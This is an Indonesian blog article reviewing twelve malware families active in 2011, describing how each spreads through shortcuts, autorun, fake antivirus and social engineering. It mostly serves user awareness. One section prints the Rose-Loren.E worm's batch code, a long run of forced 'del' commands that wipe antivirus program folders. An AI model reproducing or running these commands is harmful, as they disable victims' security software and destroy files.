Review Malware Sepanjang Tahun 2011 selain sebagai pengetahuan kita tentang beberapa malware juga sebagai kilas balik malware apa saja yang pernah menyebar di tahun 2011 lalu. Tentu malware-malware tersebut di tahun 2012 ini juga masih menunjukkan eksistensinya. Makanya tidak salah kalau sobat memabca artikel ini agar mengetahui lebih banyak tentang malware dan lebih waspada.
Berakhirnya tahun 2011 seakan tidak mempengaruhi eksistensi penyebaran malware baru, maupun varian baru dari malware yang sudah dikenali. Mereka menyebar antara lain melalui shortcut, autorun, removable disk, koneksi jaringan dan internet. Beberapa malware bahkan hangat dibahas selama berbulan-bulan antara lain Stuxnet dan Ramnit. Ditambah lagi dengan pendatang baru NgrBot yang mencuri setiap akun user yang di infeksinya, dan mungkin bisa dikatakan, bahwa 2011 masih merupakan tahun keemasan bagi NgrBot.
Berikut ini adalah 12 malware yang pernah di review sebelumnya dan cukup menarik untuk dibahas karena memiliki kemampuan payload atau aksi tertentu.
1. Delp-Shortcut (Januari)
Sempat banyak dilaporkan di akhir tahun 2010 sampai akhir januari 2011. Ciri utamanya adalah membuat 5 buah shortcut dengan nama seperti:
- Documment and Settings.lnk
- Program Files. lnk
- RECYCLER.lnk
- System Volume Information.lnk
- WINDOWS.lnk
Hostnya bernama mso.sys dan sebenarnya adalah file DLL (Dynamic Link Library). Delp-Shortcut seringkali membuat crash Explorer dan shortcut yang dibuatnya sama seperti shortcut Ramnit atau Stuxnet yang memiliki kemampuan untuk mengeksekusi secara otomatis setelah terhubung dengan komputer tanpa sepengetahuan user (shortcut exploit).
- Documment and Settings.lnk
- Program Files. lnk
- RECYCLER.lnk
- System Volume Information.lnk
- WINDOWS.lnk
Hostnya bernama mso.sys dan sebenarnya adalah file DLL (Dynamic Link Library). Delp-Shortcut seringkali membuat crash Explorer dan shortcut yang dibuatnya sama seperti shortcut Ramnit atau Stuxnet yang memiliki kemampuan untuk mengeksekusi secara otomatis setelah terhubung dengan komputer tanpa sepengetahuan user (shortcut exploit).
2. Rose-Loren.E (Februari)
Worm lokal yang merupakan hasil modifikasi varian sebelumnya ini tetap menunjukan kesan “Asli Indonesia”. Pesan berupa gambar dan puisi ini sangat menarik untuk diliat. Meski begitu, tetap saja worm ini termasuk worm yang sangat berbahaya. Karena selain bersifat menyebar dan memberikan pesan-pesan dari virus maker-nya, Rose-Loren.E juga akan menghapus seluruh file milik antivirus luar seperti yang terlihat pada source code salah satu companion dari Rose-Loren.E.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 | del /f /q /s C:\ESET\*.* >nuldel /f /q /s C:\antivi~1\*.* >nuldel /f /q /s C:\antivi~2\*.* >nuldel /f /q /s C:\antiviru\*.* >nuldel /f /q /s C:\avg\*.* >nuldel /f /q /s C:\kasper~1\*.* >nuldel /f /q /s C:\kasper~2\*.* >nuldel /f /q /s C:\mcafee\*.* >nuldel /f /q /s C:\mcafee.com\agent\*.* >nuldel /f /q /s C:\mcafee.com\*.* >nuldel /f /q /s C:\mcafee.com\VSO\*.* >nuldel /f /q /s C:\mcafee~1\*.* >nuldel /f /q /s C:\msav\*.* >nuldel /f /q /s C:\norman\*.* >nuldel /f /q /s C:\norton~1\*.* >nuldel /f /q /s C:\norton~2\*.* >nuldel /f /q /s C:\pav\*.* >nuldel /f /q /s C:\pccill~1\*.* >nuldel /f /q /s C:\iolo\*.* >nuldel /f /q /s C:\progra~1\ESET\*.* >nuldel /f /q /s C:\progra~1\antivi~1\*.* >nuldel /f /q /s C:\progra~1\antivi~2\*.* >nuldel /f /q /s C:\progra~1\avg\*.* >nuldel /f /q /s C:\progra~1\kasper~1\*.* >nuldel /f /q /s C:\progra~1\kasper~2\*.* >nuldel /f /q /s C:\progra~1\mcafee\*.* >nuldel /f /q /s C:\progra~1\McAfee.com\agent\*.* >nuldel /f /q /s C:\progra~1\McAfee.com\\*.* >nuldel /f /q /s C:\progra~1\McAfee.com\VSO\*.* >nuldel /f /q /s C:\progra~1\mcafee~1\*.* >nuldel /f /q /s C:\progra~1\mindso~1\*.* >nuldel /f /q /s C:\progra~1\norman\*.* >nuldel /f /q /s C:\progra~1\norton~1\*.* >nuldel /f /q /s C:\progra~1\norton~2\*.* >nuldel /f /q /s C:\progra~1\pandas~1\*.* >nuldel /f /q /s C:\Progra~1\Alwils~1\*.* >nuldel /f /q /s C:\progra~1\iolo\*.* >nuldel /f /q /s /a:h C:\ESET\*.* >nuldel /f /q /s /a:h C:\antivi~1\*.* >nuldel /f /q /s /a:h C:\antivi~2\*.* >nuldel /f /q /s /a:h C:\antiviru\*.* >nuldel /f /q /s /a:h C:\avg\*.* >nuldel /f /q /s /a:h C:\kasper~1\*.* >nuldel /f /q /s /a:h C:\kasper~2\*.* >nuldel /f /q /s /a:h C:\mcafee\*.* >nuldel /f /q /s /a:h C:\mcafee.com\agent\*.* >nuldel /f /q /s /a:h C:\mcafee.com\VSO\*.* >nuldel /f /q /s /a:h C:\mcafee~1\*.* >nuldel /f /q /s /a:h C:\msav\*.* >nuldel /f /q /s /a:h C:\norman\*.* >nuldel /f /q /s /a:h C:\norton~1\*.* >nuldel /f /q /s /a:h C:\norton~2\*.* >nuldel /f /q /s /a:h C:\pav\*.* >nuldel /f /q /s /a:h C:\pccill~1\*.* >nuldel /f /q /s /a:h C:\pc-cil~1\*.* >nuldel /f /q /s /a:h C:\iolo\*.* >nuldel /f /q /s /a:h C:\progra~1\ESET\*.* >nuldel /f /q /s /a:h C:\progra~1\antivi~1\*.* >nuldel /f /q /s /a:h C:\progra~1\antivi~2\*.* >nuldel /f /q /s /a:h C:\progra~1\avg\*.* >nuldel /f /q /s /a:h C:\progra~1\kasper~1\*.* >nuldel /f /q /s /a:h C:\progra~1\kasper~2\*.* >nuldel /f /q /s /a:h C:\progra~1\mcafee\*.* >nuldel /f /q /s /a:h C:\progra~1\mcafee.com\agent\*.* >nuldel /f /q /s /a:h C:\progra~1\mcafee.com\*.* >nuldel /f /q /s /a:h C:\progra~1\mcafee.com\VSO\*.* >nuldel /f /q /s /a:h C:\progra~1\mcafee~1\*.* >nuldel /f /q /s /a:h C:\progra~1\mindso~1\*.* >nuldel /f /q /s /a:h C:\progra~1\norman\*.* >nuldel /f /q /s /a:h C:\progra~1\norton~1\*.* >nuldel /f /q /s /a:h C:\progra~1\norton~2\*.* >nuldel /f /q /s /a:h C:\progra~1\pandas~1\*.* >nuldel /f /q /s /a:h C:\Progra~1\Alwils~1\*.* >nuldel /f /q /s /a:h C:\progra~1\iolo\*.* >nuldel /f /q /s /a:R C:\ESET\*.* >nuldel /f /q /s /a:R C:\antivi~1\*.* >nuldel /f /q /s /a:R C:\antivi~2\*.* >nuldel /f /q /s /a:R C:\antiviru\*.* >nuldel /f /q /s /a:R C:\avg\*.* >nuldel /f /q /s /a:R C:\kasper~1\*.* >nuldel /f /q /s /a:R C:\kasper~2\*.* >nuldel /f /q /s /a:R C:\mcafee\*.* >nuldel /f /q /s /a:R C:\mcafee.com\agent\*.* >nuldel /f /q /s /a:R C:\mcafee.com\*.* >nuldel /f /q /s /a:R C:\mcafee.com\VSO\*.* >nuldel /f /q /s /a:R C:\mcafee~1\*.* >nuldel /f /q /s /a:R C:\msav\*.* >nuldel /f /q /s /a:R C:\norman\*.* >nuldel /f /q /s /a:R C:\norton~1\*.* >nuldel /f /q /s /a:R C:\norton~2\*.* >nuldel /f /q /s /a:R C:\pav\*.* >nuldel /f /q /s /a:R C:\pccill~1\*.* >nuldel /f /q /s /a:R C:\pc-cil~1\*.* >nuldel /f /q /s /a:R C:\iolo\*.* >nuldel /f /q /s /a:R C:\progra~1\ESET\*.* >nuldel /f /q /s /a:R C:\progra~1\antivi~1\*.* >nuldel /f /q /s /a:R C:\progra~1\antivi~2\*.* >nuldel /f /q /s /a:R C:\progra~1\avg\*.* >nuldel /f /q /s /a:R C:\progra~1\kasper~1\*.* >nuldel /f /q /s /a:R C:\progra~1\kasper~2\*.* >nuldel /f /q /s /a:R C:\progra~1\mcafee\*.* >nuldel /f /q /s /a:R C:\progra~1\mcafee.com\*.* >nuldel /f /q /s /a:R C:\progra~1\mcafee.com\agent\*.* >nuldel /f /q /s /a:R C:\progra~1\mcafee.com\VSO\*.* >nuldel /f /q /s /a:R C:\progra~1\mcafee~1\*.* >nuldel /f /q /s /a:R C:\progra~1\mindso~1\*.* >nuldel /f /q /s /a:R C:\progra~1\norman\*.* >nuldel /f /q /s /a:R C:\progra~1\norton~1\*.* >nuldel /f /q /s /a:R C:\progra~1\norton~2\*.* >nuldel /f /q /s /a:R C:\progra~1\pandas~1\*.* >nuldel /f /q /s /a:R C:\Progra~1\Alwils~1\*.* >nuldel /f /q /s /a:R C:\progra~1\iolo\*.* >nul |
3. SystemTools (Maret)
Mengingatkan kita pada website resmi salah satu antivirus lokal yang disisipkan oleh antivirus palsu. Dan menariknya, antivirus palsu ini mirip seperti worm lokal yang meninggalkan pesan akan kehadirannya. Sebenarnya tidak sulit dalam menghadapi malware tipe trojan ini, SystemTools hanya memfokuskan payload untuk mendisable proses yang namanya tidak tidak seperti proses aplikasi pada Windows.
4. FakeAV-Downloader.K (April)
Lagi-lagi antivirus palsu yang menyerang user. Kali ini menyebar lewat email dari website yang mungkin sudah dikuasai pihak lain selain pemilik aslinya. Dan dengan sengaja mengirimkan sebuah pesan email ke setiap user secara acak yang isinya terlampir sebuah file antivirus palsu. Dan parahnya, layaknya antivirus palsu yang umumnya mengharuskan user membayar sejumlah uang dengan nilai nominal yang cukup tinggi untuk mendapatkan aktifasi serial number antivirus palsu tersebut. Dan kenyataannya, tidak ada jaminan bahwa setelah user membayarkan nominal yang tertera pada websitenya, komputer yang terinfeksi antivirus palsu tersebut akan kembali normal.
5. FontPorn (Mei)
Sosial Engeneering adalah konsep yang tepat untuk menggambarkan teknik FontPorn untuk menginfeksi komputer user. Banyak dikeluhkan user yang katanya ada shortcut porno di flash disknya. Karena memang setelah aktif di memory, FontPorn akan membuat beberapa file seperti:
1. autorun.inf
2. pornmovs.lnk (icon folder)
3. myporno.avi.lnk (icon file video)
4. setup50045.lnk (icon shortcut)
5. setup50045.fon (host dengan icon font file)
Selain bersifat worm, FontPorn juga melakukan koneksi ke website yang berasal dari Ukraina. Meski demikian, belum tentu FontPorn berasal dari Ukraina.
1. autorun.inf
2. pornmovs.lnk (icon folder)
3. myporno.avi.lnk (icon file video)
4. setup50045.lnk (icon shortcut)
5. setup50045.fon (host dengan icon font file)
Selain bersifat worm, FontPorn juga melakukan koneksi ke website yang berasal dari Ukraina. Meski demikian, belum tentu FontPorn berasal dari Ukraina.
6. Serviks.I (Juni)
Salah satu varian worm Serviks buatan Serviks Maker adalah Serviks.I. Mencari setiap file dokumen HTML dan PHP yang terdapat pada drive kemudian dihapus dan digantingan dengan dokumen baru yang berisi pesan dari Serviks Maker. Namun setelah dilihat lebih jauh, worm Serviks.I kali ini hanyalah hasil modifikasi dari worm Aksika yang memang source codenya disebarluaskan.
7. Proklamasi (Juli)
Menjelang perayaan 17 Agustus 2011, ada saja virus maker yang membuat perayaan dengan cara sendiri. Teks Proklamasi yang biasanya dibacakan saat prosesi upacara bendera setiap tanggal 17 agustus ini, dibuat sedikit berbeda oleh worm Proklamasi. Melalui pesan pada file HTML-nya, kita dapat melihat teks proklamasi. Meski belum banyak laporan akan menyebarnya worm ini, tetap saja termasuk worm yang berbahaya.
8. NgrBot (Agustus)
Ini dia, sang pencuri ulung dengan kemampuan bersembunyi yang mampu disiapkan seseorang secara sengaja untuk mencuri akun milik user yang diinfeksinya. Worm tipe trojan ini memang sengaja dibuat untuk kepentingan pribadi dan mendapatkan keuntungan sebesar-besarnya dari hasil infeksi setiap komputer yang terkoneksi dengan internet. Belakangan ini dilaporkan juga bahwa NgrBot banyak menyebar melalui chat pada Facebook.
9. None (September)
Ukurannya 2MB, padahal source aslinya hanya berukuran 55.1 KB dan None adalah worm yang berasal dari Indonesia. Social Engineering merupakan media utama worm ini dalam menyebar. Dengan nama “cara_menghapus_virus_win32_ramnit_sality.rar” seolah akan meyakinkan user untuk melihat dokumen asli dari file archive tersebut. Di dalam pesan dari worm None, disisipkan sebuah URL yang mengarah kepada situs porno. Worm ini semakin terlihat sangat istimewa dengan bergeraknya start menu dan bergeraknya cursor dengan sendirinya secara acak yang akan membuat user kesulitan dalam mengendalikan komputer yang sudah terinfeksi worm ini.
10. AryaN (Oktober)
Masih dengan shortcut, AryaN melakukan sedikit modifikasi pada teknik membuat shortcutnya. Umumnya, setelah malware membuat shortcut pada flash disk menggunakan nama dari file atau folder, kemudia file atau folder tersebut di-hidden. Sedangkan AryaN, tidak meng-hidden file atau foldernya, tetapi membackup file tersebut kedalam sebuah folder yang dibuat oleh AryaN. Dan setiap shortcut yang dihasilkan, memiliki icon yang sama seperti file aslinya. Sehingga, bagi user yang lengah sudah tentu akan mengaktifkan malware yang dipanggil melalui shortcut.
11. BlackLabel (November)
Diawali dengan website yang seolah akan menunjukan konten porno, kemudian user akan diarahkan kesebuah halaman website dan mendapat peringatan bahwa komputernya terinfeksi virus. Setelah itu secara otomatis user mendownload sebuah file, begitulah teknik yang digunakan BlackLabel. Setelah aktif di memory, BlackLabel akan mendownload file varian lainnya.
12. Alice (Desember)
Penutup malware di 2011 ini adalah worm tipe VBS yang juga menginfeksi file HTML atau HTM. Bukan hanya menginfeksi file, Alice juga memiliki keunikan lain dimana hampir seluruh tubuhnya di-encode. Dengan tubuh yang berisi source code acak, Alice termasuk worm yang berhasil meloloskan diri dari beberapa antivirus luar termasuk lokal. Worm sederhana yang akan membuat jengkel beberapa user karena ditemukan adanyak ketidak wajaran dari file document Microsoft Word. Wajar saja, setiap dokumen dengan tipe *.doc, *.docx dan *.rtf.
Dari beberapa malware yang sudah di jelaskan di atas, terdapat juga malware yang masih banyak menyebar seperti Sality, Alman, Virut, Conficker. Dengan adanya teknik encode seperti Alice, besar kemungkinan di tahun 2012 nanti akan ada malware tipe vbs yang menggunakan teknik encode seperti Alice. Dan teror NgrBot, akan sepertinya akan terus berlanjut.
Sumber : www.virusindonesia.com